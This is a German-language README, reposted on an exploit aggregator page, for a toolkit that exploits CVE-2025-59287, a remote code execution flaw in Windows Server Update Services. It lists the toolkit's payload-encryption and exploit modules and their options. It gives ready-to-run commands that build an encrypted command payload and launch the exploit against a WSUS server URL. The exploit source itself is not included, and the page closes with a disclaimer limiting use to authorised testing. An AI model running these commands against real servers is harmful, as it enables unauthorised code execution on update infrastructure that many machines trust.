Sploitus

Exploit for cve-2025-59287 CVE-2025-59287

kitploit · 2026-08-26

Exploit Code

MARKDOWN126 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ADEL-HX0D-CVE-2025-59287
CVE-2025-59287 - WSUS-Exploitation-Toolkit

von adel-h4x0a

⚠️ Nur für Bildungs- und autorisierte Testzwecke ⚠️

Überblick

Dieses Toolkit demonstriert die Ausnutzung von CVE-2025-59287, einer Remotecodeausführung-Schwachstelle in Windows Server Update Services (WSUS).

Komponenten

  1. Verschlüsselungsmodul (cve-2025-59287-encr.py)



· AES-Payload-Verschlüsselung für die WSUS-Kommunikation · Unterstützung sowohl für Legacy- als auch für sichere Verschlüsselungsmodi · Benutzerdefinierte Payload-Generierung

  2. Exploit-Modul (cve-2025-59287-exp.py)



· Vollständige Exploit-Kette für CVE-2025-59287 · Robuste Fehlerbehandlung und Wiederholungslogik · Unterstützung für benutzerdefinierte Payloads

Struktur

root@kitploit:~
    
    
    📁 CVE-2025-59287-WSUS-Exploit/
    ├── 📄 cve-2025-59287-encr.py      # Verschlüsselungsmodul
    ├── 📄 cve-2025-59287-exp.py       # Exploit-Modul
    ├── 📄 requirements.txt            # Abhängigkeiten
    └── 📄 README.md                   # Diese Datei
    

Verwendung

Voraussetzungen

root@kitploit:~
    
    
    pip install -r requirements.txt
    

Verschlüsselung

root@kitploit:~
    
    
    # Basisverschlüsselung
    python cve-2025-59287-encr.py --command "calc" --mode legacy
    
    # Verschlüsselung mit benutzerdefiniertem Schlüssel
    python cve-2025-59287-encr.py --key "877C14E433638145AD21BD0C17393071" --command "whoami"
    
    # Ausgabe in Datei speichern
    python cve-2025-59287-encr.py --command "ipconfig" --output payload.txt
    

Exploit

root@kitploit:~
    
    
    # Basis-Exploit
    python cve-2025-59287-exp.py http://wsus-server:8530
    
    # Mit benutzerdefiniertem Payload
    python cve-2025-59287-exp.py http://192.168.1.100:8530 --payload custom_payload.txt
    
    # Mit erweiterten Einstellungen
    python cve-2025-59287-exp.py http://wsus-server:8530 --timeout 60 --retries 5
    

Optionen

Verschlüsselungsmodul (cve-2025-59287-encr.py)

· --key: AES-Schlüssel im Hex-Format (optional) · --command: Auszuführender Befehl (Standard: calc) · --mode: Verschlüsselungsmodus [`legacy`, `secure`] (Standard: legacy) · --output: Ausgabedatei zum Speichern des Payloads (optional)

Exploit-Modul (cve-2025-59287-exp.py)

· target: WSUS-Server-URL (erforderlich) · --payload: Benutzerdefinierte Base64-Payload-Datei (optional) · --timeout: Request-Timeout in Sekunden (Standard: 30) · --retries: Anzahl der Wiederholungsversuche (Standard: 3) · --no-banner: Banneranzeige unterdrücken (optional)

Vollständiges Beispiel

root@kitploit:~
    
    
    # Benutzerdefinierten Payload generieren
    python cve-2025-59287-encr.py --command "whoami /all" --output custom_payload.txt
    
    # Exploit ausführen
    python cve-2025-59287-exp.py http://wsus.internal.com:8530 --payload custom_payload.txt
    

Rechtlicher Hinweis

❗ Wichtige Warnung:

Dieses Tool wird nur für Bildungszwecke und autorisierte Penetrationstests bereitgestellt. Die unbefugte Nutzung gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist illegal.

Dieses Tool sollte nur in folgenden Fällen verwendet werden:

· Testumgebungen, die Ihnen gehören · Systeme, für die Sie eine schriftliche Genehmigung zum Testen erhalten haben · Bildungs- und akademische Zwecke

Der Entwickler übernimmt keine Verantwortung für eine illegale oder unbefugte Nutzung dieses Tools.

Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert.

Updates

· v1.0: Erste Veröffentlichung mit vollständiger Exploit-Unterstützung · v1.1: Verbesserte Fehlerbehandlung und verbesserte Protokollierung

Mitwirken

Fehlerberichte und Pull-Requests sind erwünscht, um das Tool im Rahmen einer verantwortungsvollen und ethischen Nutzung zu verbessern.

* * *

Hinweis: Holen Sie vor dem Testen eines Systems immer eine schriftliche Genehmigung ein. Sicherheitsbewusstsein beginnt mit Verantwortung. 🔒